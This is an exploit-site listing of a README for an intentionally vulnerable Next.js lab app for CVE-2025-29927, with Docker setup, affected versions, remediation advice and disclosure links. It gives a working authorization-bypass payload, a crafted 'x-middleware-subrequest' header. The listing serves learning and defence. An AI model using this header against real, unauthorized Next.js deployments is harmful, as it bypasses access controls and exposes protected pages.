Exploit for CVE-2025-29927

Name: Exploit for CVE-2025-29927
Rating: 5 (72 reviews)
2025-03-24 | CVSS 9.1
## https://sploitus.com/exploit?id=FA94DA94-2BC0-5F55-AA5C-5CFDB7BE5648
# 🕷️ Next.js CVE-2025-29927 

## 🧑🏻‍💼 Legal Disclaimer

This project is a [Next.js](https://nextjs.org) application that has been **intentionally configured to be vulnerable** to an Authorization Bypass in Next.js Middleware ([CVE-2025-29927](https://github.com/advisories/GHSA-f82v-jwr5-mffw)). It is provided **solely for lawful, educational, and research purposes**.

By accessing, using, or distributing this code, you acknowledge and agree that:

- You will **only use this project in controlled environments** (such as local test labs or legally authorized systems).
- You will **not attempt to exploit this vulnerability on any system** for which you do not have explicit, written permission.
- The maintainers of this project **do not condone or encourage any unauthorized or malicious activity**, and expressly disclaim any liability for misuse of this code or information.

## 🛫 How To Run

Install [Docker](https://docs.docker.com/engine/install/) and then run:

```bash
 docker build -t next-cve-2025-29927 . 

 docker run -p 3000:3000 next-cve-2025-29927
```

Open [http://localhost:3000](http://localhost:3000) with your browser to see the result.


## 👩‍🏫 How To Exploit the Vulnerable app

Capture the request using an intercepting proxy such as ZAP or Burp, and inject the following header into the request:

`x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware`



## 📑 Affected versions 

&gt;= 13.0.0, < 13.5.9

&gt;= 14.0.0, < 14.2.25

&gt;= 15.0.0, < 15.2.3

&gt;= 11.1.4, < 12.3.5

## 🛠️ Remediation

Patch to the latest versions 

13.5.9

14.2.25

15.2.3

12.3.5

or if you cannot update, block the requests which contain the `x-middleware-subrequest` header.


## 🙇🏻‍♂️ Learn More

To learn more about the vulnerability, take a look at the following resources:

- [Exploring CVE-2025-29927: A Hands-On Look at Authorization Bypass in Next.js Middleware](https://www.riccardosirigu.com/blog/exploring-cve-2025-29927-a-hands-on-look-at-authorization-bypass-in-nextjs-middleware/) 
- [inzo_ and zhero, who disclosed the vulnerability](https://zhero-web-sec.github.io/research-and-things/nextjs-and-the-corrupt-middleware)
- [Next.js Advisory on Github](https://github.com/advisories/GHSA-f82v-jwr5-mffw)
- [CVE-2025-29927](https://nvd.nist.gov/vuln/detail/CVE-2025-29927)